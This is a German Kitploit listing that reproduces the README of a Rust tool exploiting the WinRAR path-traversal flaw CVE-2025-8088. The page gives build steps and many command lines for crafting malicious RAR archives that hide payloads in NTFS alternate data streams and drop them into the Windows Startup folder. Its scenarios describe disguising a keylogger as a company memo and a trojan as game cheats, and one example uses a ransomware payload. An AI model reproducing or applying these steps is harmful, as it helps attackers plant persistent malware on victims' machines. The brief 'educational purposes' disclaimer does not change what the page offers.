Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WinRAR-Exploit-Tool---Rust-Edition — Eine leistungsstarke, speichersichere Implementierung des WinRAR CVE-2025-8088 Exploit-Tools, umgeschrieben in Rust für bessere Zuverlässigkeit und Leistung. | Kitploit
Tools/GitHubGitHub/kitsuneshade/winrar-exploit-tool---rust-edition
PersistenzmechanismenExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsLernen & BildungRed TeamingPayload-EntwicklungBinary-Exploitation

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubkitsuneshade/winrar-exploit-tool---rust-edition

WinRAR-Exploit-Tool---Rust-Edition

Eine leistungsstarke, speichersichere Implementierung des WinRAR CVE-2025-8088 Exploit-Tools, umgeschrieben in Rust für bessere Zuverlässigkeit und Leistung.

Repository anzeigen
83vor 11 MonatenNoch nicht geprüft

WinRAR Exploit Tool - Rust Edition

Fortschrittliches WinRAR Path Traversal Exploit Tool – Geschrieben in Rust

Eine leistungsstarke, speichersichere Implementierung des WinRAR CVE-2025-8088 Exploit Tools, für bessere Zuverlässigkeit und Leistung in Rust neu geschrieben.

Funktionen

  • ADS-Ausnutzung – NTFS-Alternate-Data-Streams zum Verstecken der Payload
  • RAR5-Header-Manipulation – Direktes Patchen der Header für Pfadinjektion
  • Moderne GUI – Wunderschöne GTK-basierte Oberfläche mit CSS-Styling
  • Startup-Zielsetzung – Automatische Platzierung der Payload im Windows-Autostart
  • Unterstützung für eigene Köderdateien – Verwenden Sie eigene Köderdateien oder die Standarddatei
  • Universelle Dateiunterstützung – Unterstützt jeden Dateityp für Payload und Köder
  • Robuste Fehlerbehandlung – Umfassende Fehlerprüfung und Diagnose
  • Systemdiagnose – Automatische Überprüfung der Systemkompatibilität
  • Speichereffizient – Geringer Speicherverbrauch mit intelligentem Ressourcenmanagement

Voraussetzungen

  • Rust 1.70+ – Moderne Rust-Toolchain
  • GTK-Entwicklungsbibliotheken – Für GUI-Unterstützung
  • WinRAR CLI – Für die Erstellung von RAR-Archiven
  • Windows 10/11 – NTFS-Unterstützung erforderlich

Schnellstart

1. Rust installieren

root@kitploit:~
# Rust mit rustup installieren


# Installation überprüfen
rustc --version
cargo --version

2. GTK-Entwicklungsbibliotheken installieren

Windows (MSVC)

root@kitploit:~
# Mit vcpkg
vcpkg install gtk:x64-windows

Oder mit MSYS2

root@kitploit:~
pacman -S mingw-w64-x86_64-gtk4

3. Klonen und Bauen

root@kitploit:~
# Ins Rust-Projektverzeichnis wechseln
cd winrar_exploit_rust

# Im Debug-Modus bauen
cargo build

# Optimierte Release-Version bauen
cargo build --release

# Anwendung ausführen
cargo run --release

Verwendung

  1. Payload auswählen – Eine beliebige Datei als Payload (.exe, .bat, .jpg, .pdf usw.)
  2. Köder wählen – Eine beliebige Datei als Köder (wenn leer, wird Standard erstellt)
  3. Archiv benennen – Ausgabe-RAR-Dateinamen eingeben
  4. Bauen – Das Exploit-Archiv generieren

Beispiele

Grundlegende Verwendung

Ein einfaches Exploit mit einer Payload- und einer Köderdatei erstellen:

root@kitploit:~
# Exploit mit ausführbarer Payload erstellen
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"

# Exploit mit Skript-Payload erstellen
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"

Fortgeschrittene Verwendung

Mehrere Köderdateien

root@kitploit:~
# Mehrere, durch Kommas getrennte Köderdateien verwenden
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"

Benutzerdefiniertes Zielverzeichnis

root@kitploit:~
# Eigenes Verzeichnis angeben, in das die Payload abgelegt werden soll
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"

Verschiedene Payload-Typen

root@kitploit:~
# Bild-Payload (Steganographie)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"

# PDF-Payload
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"

# Batch-Skript-Payload
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"

Systemdiagnose

root@kitploit:~
# Systemdiagnose ausführen, um Kompatibilität zu prüfen
.\winrar_exploit_rust.exe diagnose

# Verfügbare Tools und Funktionen anzeigen
.\winrar_exploit_rust.exe tools

Praxisnahe Szenarien

Szenario 1: Unternehmensumgebung

root@kitploit:~
# Ein bösartiges Dokument erstellen, das wie eine Firmennotiz aussieht
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"

Szenario 2: Gaming-Community

root@kitploit:~
# Schadsoftware in einer Spiel-Cheat-Datei verstecken
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"

Das Tool erstellt RAR-Archive mit Pfad-Traversal unter Verwendung von:

  1. ADS-Erstellung – Versteckt die Payload in NTFS-Alternate-Data-Streams
  2. RAR-Erstellung – Erstellt ein Basis-RAR mit ADS über die WinRAR-CLI
  3. Header-Patchen – Injiziert den Traversal-Pfad in RAR5-Header
  4. CRC-Neuberechnung – Stellt die Archiv-Integrität sicher
  5. Ausgabe – Liefert das schädliche RAR zur Extraktion bereit

Pfadbeispiel: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

Unterstützte Dateitypen

Payload-Dateien:

  • ✅ Ausführbare Dateien (.exe, .bat, .cmd)
  • ✅ Skripte (.py, .js, .vbs, .ps1)
  • ✅ Dokumente (.pdf, .docx, .xlsx)
  • ✅ Bilder (.jpg, .png, .gif)
  • ✅ Videos (.mp4, .avi)
  • ✅ Audio (.mp3, .wav)
  • ✅ Jeder Dateityp

Köderdateien:

  • ✅ Textdateien (.txt, .doc, .pdf)
  • ✅ Bilder (.jpg, .png, .gif, .bmp)
  • ✅ Videos (.mp4, .avi)
  • ✅ Audio (.mp3, .wav)
  • ✅ Dokumente (.docx, .xlsx)
  • ✅ Jeder Dateityp

Architektur

root@kitploit:~
winrar_exploit_rust/
├── src/
│   ├── main.rs          # Anwendungs-Einstiegspunkt
│   ├── gui.rs           # GTK-basierte Benutzeroberfläche
│   ├── exploit.rs       # Kern-Exploit-Logik
│   ├── ads.rs           # NTFS-ADS-Manipulation
│   ├── rar.rs           # RAR5-Header-Manipulation
│   ├── diagnostics.rs   # Systemdiagnose
│   └── error.rs         # Fehlerbehandlung
├── Cargo.toml           # Abhängigkeiten und Build-Konfiguration
└── README.md            # Diese Datei

Fehlerbehebung

Das Tool enthält eine automatische Diagnose, die Folgendes prüft:

  • ✅ WinRAR-CLI-Installation
  • ✅ NTFS-ADS-Unterstützung
  • ✅ Schreibberechtigungen für das Startup-Verzeichnis
  • ✅ Verfügbarkeit der GTK-Bibliothek
  • ✅ Dateisystem-Kompatibilität

Häufige Probleme:

  1. „GTK nicht gefunden“

    root@kitploit:~
    # GTK-Entwicklungsbibliotheken installieren
    # Windows (vcpkg)
    vcpkg install gtk:x64-windows
    
    # Oder mit MSYS2
    pacman -S mingw-w64-x86_64-gtk4
    
  2. „WinRAR-CLI nicht gefunden“

    • WinRAR von https://www.winrar.com installieren
    • Sicherstellen, dass sich rar.exe in Program Files befindet
  3. „Kann nicht in das Startup-Verzeichnis schreiben“

    • Das Tool als Administrator ausführen
    • Ordnerberechtigungen prüfen
  4. „NTFS-ADS nicht unterstützt“

    • Sicherstellen, dass das NTFS-Dateisystem verwendet wird
    • ADS wird auf FAT32/exFAT nicht unterstützt
  5. Kompilierungsfehler

    root@kitploit:~
    # Rust-Toolchain aktualisieren
    rustup update
    
    # Bereinigen und neu bauen
    cargo clean
    cargo build --release
    

Code-Formatierung

root@kitploit:~
# Code formatieren
cargo fmt

# Code linten
cargo clippy

Abhängigkeiten

Wichtige Abhängigkeiten umfassen:

  • gtk – Modernes GUI-Framework
  • tokio – Asynchrone Laufzeit
  • windows – Windows-API-Bindungen
  • crc32fast – Schnelle CRC32-Berechnung
  • byteorder – Byte-Reihenfolge-Manipulation
  • anyhow – Fehlerbehandlung

Sicherheitsaspekte

  • Bildungszweck: Dieses Tool dient ausschließlich autorisierten Tests und Bildungszwecken
  • Kontrollierte Umgebung: Nur in kontrollierten Umgebungen mit entsprechender Zustimmung verwenden
  • Rechtliche Konformität: Sicherstellen, dass die geltenden Gesetze und Vorschriften eingehalten werden
  • Verantwortungsvolle Offenlegung: Bewährte Praktiken der verantwortungsvollen Offenlegung befolgen

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

Autor

Erstellt von @kanonufo auf Telegram


Hochleistungs-Red-Team-Tool für die Ausnutzung von CVE-2025-8088 – Rust-Edition

Tool herunterladen